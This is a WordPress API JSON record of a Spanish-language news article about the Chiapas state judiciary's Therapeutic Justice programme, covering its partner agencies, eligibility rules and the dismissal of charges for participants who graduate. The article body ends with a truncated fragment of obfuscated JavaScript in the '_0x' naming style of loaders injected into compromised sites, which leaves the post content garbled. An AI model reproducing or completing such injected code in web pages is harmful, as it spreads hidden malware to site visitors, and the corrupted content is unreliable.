{"id":24133,"date":"2025-09-22T04:25:00","date_gmt":"2025-09-22T04:25:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24133"},"modified":"2025-09-22T04:25:00","modified_gmt":"2025-09-22T04:25:00","slug":"con-justicia-terapeutica-poder-judicial-del-estado-refrenda-su-enfoque-humanista","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24133","title":{"rendered":"Con Justicia Terap\u00e9utica, Poder Judicial del Estado refrenda su enfoque humanista"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"24134\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345004-1024x768.jpg\" alt=\"\" class=\"wp-image-24134\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345004-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345004-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345004-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345004-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345004-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"24135\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345001-1024x768.jpg\" alt=\"\" class=\"wp-image-24135\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345001-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345001-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345001-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345001-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345001-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>21 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- El Poder Judicial del Estado de Chiapas, que preside Juan Carlos Moreno Guill\u00e9n, impulsa programas y mecanismos que promueven la atenci\u00f3n de las causas subyacentes de los problemas legales, y no \u00fanicamente sus consecuencias, permitiendo fortalecer el bienestar, la recuperaci\u00f3n y la prevenci\u00f3n, como es el caso del Programa de Justicia Terap\u00e9utica.<\/p>\n\n\n\n<p>En este contexto, la secretaria t\u00e9cnica de la Comisi\u00f3n Interinstitucional para la Implementaci\u00f3n de la Reforma Constitucional en Materia de Seguridad y Justicia Penal en el Estado de Chiapas, Karla Qui\u00f1ones Rodr\u00edguez, destac\u00f3 que dicho programa est\u00e1 integrado por un grupo multidisciplinario, donde convergen la Fiscal\u00eda General del Estado, la Secretar\u00eda del Pueblo, la Secretar\u00eda de Salud (a trav\u00e9s del IMSS Bienestar) y, como coordinador, el Poder Judicial del Estado.<\/p>\n\n\n\n<p>Asimismo, subray\u00f3 que, para acceder a los beneficios del programa, las personas interesadas deben manifestar su voluntad de participar, no haber cometido un delito grave, contar con una vinculaci\u00f3n a proceso por un delito cuyo rango punitivo sea menor a cinco a\u00f1os, as\u00ed como cumplir con los requisitos establecidos en los art\u00edculos 192 al 196 del C\u00f3digo Nacional de Procedimientos Penales.<\/p>\n\n\n\n<p>De igual manera, Qui\u00f1ones Rodr\u00edguez explic\u00f3 que cada persona que ingresa es valorada tanto en su estado de salud f\u00edsica como psicol\u00f3gica, con el fin de que el grupo multidisciplinario dise\u00f1e un plan individualizado que defina las acciones a seguir y la duraci\u00f3n del programa. Adem\u00e1s, el progreso se evaluar\u00e1 peri\u00f3dicamente, para verificar el cumplimiento de metas y objetivos. En caso de que la persona se grad\u00fae satisfactoriamente, se le declarar\u00e1 la extinci\u00f3n de la acci\u00f3n penal, y, por ende, el sobreseimiento del proceso penal, con los efectos de una sentencia absolutoria.<\/p>\n\n\n\n<p>Finalmente, afirm\u00f3 que este programa representa una alternativa m\u00e1s humana y efectiva al modelo tradicional, ya que, mediante un enfoque integral y colaborativo centrado en la rehabilitaci\u00f3n en lugar del castigo, es posible transformar vidas, reducir la reincidencia delictiva y, sobre todo, contribuir a la construcci\u00f3n de una sociedad m\u00e1s justa y equitativa.<\/p>\n\n\n\n<p>Manifest\u00f3 Qui\u00f1onez Rodr\u00edguez, durante una entrevista en el programa \u00a1Hola Chiapas!, donde el Poder Judicial cuenta con un segmento semanal los d\u00edas viernes a partir de las 11:00 horas, por Tuchtl\u00e1n Radio 93.9 FM, perteneciente al Sistema Chiapaneco de Radio, Televisi\u00f3n y Cinematograf\u00eda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>21 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- El Poder Judicial del Estado de Chiapas, que preside Juan Carlos Moreno Guill\u00e9n, impulsa programas y mecanismos que promueven la atenci\u00f3n de las causas subyacentes de los problemas legales, y no \u00fanicamente sus consecuencias, permitiendo fortalecer el bienestar, la recuperaci\u00f3n y la prevenci\u00f3n, como es el caso del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24135,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24133","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24133","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24133"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24133\/revisions"}],"predecessor-version":[{"id":24136,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24133\/revisions\/24136"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24135"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24133"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24133"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24133"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}